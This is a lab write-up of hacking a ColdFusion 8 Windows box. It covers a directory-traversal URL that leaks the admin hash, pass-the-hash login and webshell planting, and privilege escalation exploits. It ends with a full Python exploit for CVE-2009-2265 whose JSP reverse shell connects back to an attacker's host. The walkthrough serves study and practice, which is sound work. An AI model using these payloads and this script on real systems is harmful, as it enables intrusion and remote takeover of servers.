ENUMERATION
Nmap tcp full scan
nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.11The nmap output highlighted the presence of:
fmtp?on port 8500.msrpcon port 135,49154:Microsoft Windows RPC.
First thing I tried was browsing to http://10.10.10.11:8500 but it was taking too long so I thought no web server was running on the target 🙃.
Till then I never heard of fmtp then I searched for it to gain more information about the unusual service. From eurocontrol:
Flight Message Transfer Protocol (FMTP) is a communication stack based on the transmission control and internet protocols (TCP/IP). It is used in a peer-to-peer communication context for the information exchange between flight data processing systems for the purpose of notification, coordination and transfer of flights between air traffic control units and for the purposes of civil-military cooperation.
Next step was to look for vulnerabilities present in this protocol
Results didn’t seem helpful at all. The last resort was trying null session login with rpcclient. It was another bust.
As a reminder about ? meaning, from nmap website:
The question mark tells us that Nmap was not even able to determine the service name through probing. As a fallback, rndc is mentioned because that has port 953 registered in
nmap services.
That means that fmtp was just a guess. I decided to open a tab, insert againhttp://10.10.10.11:8500 as the URL and wait while I was running again ports scans to be sure that no ports were missed the first time….a web server hosting ColdFusion was running on the target 😬.
Since I’ve already faced ColdFusion in another lab I knew /CFIDE/ directory was related to it and that in some versions you can extract the admin hash using Local File Inclusion. The plan was: get the hash, log in as admin, look for authenticated RCE.
Browsing to 10.10.10.11:8500/CFIDE/administrator/ indicated the installed version: ColdFusion 8.
EXPLOITATION
searchsploit highlighted how several vulnerabilities exist for this framework.
Anyway multiple vulnerabilities are related to XSS or other versions of ColdFusion. I removed them with:
searchsploit coldfusion 8 | grep -v -e Cross -e Allaire -e Database -e BlazeDS -e Credential -e Development
The list of the potential candidates was built:
- Adobe ColdFusion — Directory Traversal
EDB-ID: 14641
The exploit tries to retrieve the admin hash exploiting CVE-2010–2861. The payload is:
locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
EDB-ID: 16985 (msf)
Metaspoit module which leverages CVE-2010–2861 to extract the admin hash and then reach RCE using a scheduled task.
2. Arbitrary File Upload
EDB-ID: 45979
A .txt which shows how to upload a shell exploiting CVE-2018–15961. The vulnerable path is /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm .
EDB-ID: 16788 (msf)
Metaspoit module which leverages CVE-2009–2265 to upload a payload. The path to upload is :
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
Directory trasversal
I went down the path I already used before, then the administrator hash was retrieved using the payload indicated within EDB-ID: 14641.
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Identify the hash type
At this point 2 ways to use the hash were possible: crack the hash, pass the hash. Usually to identify the hash type I use hashid , hash-identifier or the framework documentation to look for default configuration.
Both hashid and hash-identifier results indicated that the hash was computed using SHA1 (which should be avoided as reported by Schneier).
Crack the hash
The cleartext password was easily found using online rainbow tables: happyday .
In this scenario the password was simple, already cracked and available on the web. Let’s suppose the password was complex and you couldn’t crack it. There is another way to gain admin access to ColdFusion leveraging the Pass The Hash technique. That mean you don’t need the cleartext password but you can reuse the extracted hash.
Pass The Hash
If you read the source code at /CFIDE/administrator login page, on POST action the admin password value is computed as the HMAC of the salt and the password SHA1.
The salt is passed as the key. The password SHA1 is passed as data.
About every 30" the salt changes, in fact as reported below if you wait a while the hidden field value is different every time.
Since we could retrieve the password SHA1 it was possible to reuse the hash with the salt. The goal was to quickly generate the following value and send it as the password.
cfadminPassword.value = hmac(current_salt, admin_SHA1_LFI)
Steps:
- open burp.
- enter the extracted admin hash in the password field.
3. run javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value) in the browser console to generate the salted hash.
4. copy the new generated hash.
5. set intercept on, click the login button and modify the intercepted request replacing the cfadminPassword value with the new one. Forward the request.
6. You are now logged in as admin.
RCE
It was time to upload a webshell. kali already has a .cfm (ColdFusion markup) version.
Since we needed to write the webshell to a file, /CFIDE (Logical Path) Directory Path physical path was recorded in order to be able to access the webshell from the browser.
C:\ColdFusion8\wwwroot\CFIDE\
A new scheduled task was created as follows:
The task was triggered by clicking on the green icon.
The shell was reachable at http://10.10.10.11:8500/CFIDE/shell.cfm .
Running just whoami didn’t work.
Another failed attempt with cmd absolute path.
Also with the output redirection I couldn’t see any output 😐.
Although pinging my system was working.
I also unsuccessfully tried both certutilto download nc.exeand powershell.exe to download and execute a reverse shell payload.
Server header
The server responses included the Server: JRun Web Server header.
From JRun and Coldfusion docs JRun server seems to run also JSP files.
So the next step was using a .jsp reverse shell instead of a .cfm webshell.
Triggering the reverse shell was really annoying because I had to try several times before it worked. Most of the times I got Connection Timeout error. Finally it worked.
PRIVILEGE ESCALATION
JuicyPotato
whoami /priv indicated it was time for our beloved JuicyPotato .
Remember to transfer also nc if you want to launch a reverse shell.
systeminfo
On this box no patch was applied, then kernel exploits could be a potential PE vector.
OS Name: Microsoft Windows Server 2008 R2 StandardOS Version: 6.1.7600 N/A Build 7600
MS10–059 aka Chimichurri
Between the exploits suggested by windows-exploit-suggester this one worked.
MS10–092 (msf)
The privilege escalation was also possible using this metasploit module, as shown by ippsec.
exploit/windows/local/ms10_092_schelevator
EXTRA
Since the arbitrary file upload exploit through FCKeditor didn’t seem complex, as an exercise I tried to write a python version of it. The exploit loads a .jsp reverse shell.
Usage
- Start a listener.
2. Run the exploit.
3. Browse to the reverse shell payload location.
4. Receive the reverse shell.
POC
#!/usr/bin/python3
import requests
import sys
import string
import random
import urllib
# Title: FCKeditor 'CurrentFolder' Parameter Arbitrary File Upload Vulnerability
# Tested on: Coldfusion8
# CVE: 2009-2265
# Description: this exploit uploads a .jsp reverse shell leveraging FCKeditor.
if len(sys.argv) != 5:
print ('Usage: exploit.py <LHOST> <LPORT> <TARGET> <RPORT>')
print ('Example: exploit.py 10.10.10.10 445 http://10.10.10.11 8500 1')
exit(0)
lhost=sys.argv[1]
lport=sys.argv[2]
target=sys.argv[3]
rport=sys.argv[4]
payload="""
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread{
InputStream dj;
OutputStream cr;
StreamConnector( InputStream dj, OutputStream cr )
{
this.dj = dj;
this.cr = cr;
}
public void run()
{
BufferedReader zf = null;
BufferedWriter qhx = null;
try
{
zf = new BufferedReader( new InputStreamReader( this.dj ) );
qhx = new BufferedWriter( new OutputStreamWriter( this.cr ) );
char buffer[] = new char[8192];
int length;
while( ( length = zf.read( buffer, 0, buffer.length ) ) > 0 )
{
qhx.write( buffer, 0, length );
qhx.flush();
}
} catch( Exception e ){}
try
{
if( zf != null )
zf.close();
if( qhx != null )
qhx.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "LHOST_HERE", LPORT_HERE );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
"""
payload = payload.replace("LHOST_HERE", lhost)
payload = payload.replace("LPORT_HERE", lport)
shell_name=''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
fake_filename=''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
upload_uri=target+':'+rport+'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'
files = {'newfile': (fake_filename+'.txt', payload, 'application/x-java-archive')}
params={'Command':'FileUpload','CurrentFolder':'/'+shell_name+'.jsp%00','Type':'File'}
params_str = urllib.parse.urlencode(params, safe='%')
r = requests.post(upload_uri, params=params_str, files=files)
print ('Reverse shell location:')
print (target+':'+rport+'/CFIDE/usersfile/file/'+shell_name+'.jsp')ColdFusion Useful Resources
LESSONS LEARNED
- don’t rush…some time you need to wait.
service?in nmap output means that the scan wasn’t able to determine the service.- grep OR:
grep -e pattern1 -e pattern2 filename hashid,hash-identifiercan help to identify a hash type.- crack the hash or pass the hash.
- server response headers can give helpful information.
- ColdFusion8 interesting CVEs: CVE-2010–2861, CVE-2018–15961, CVE-2009–2265.
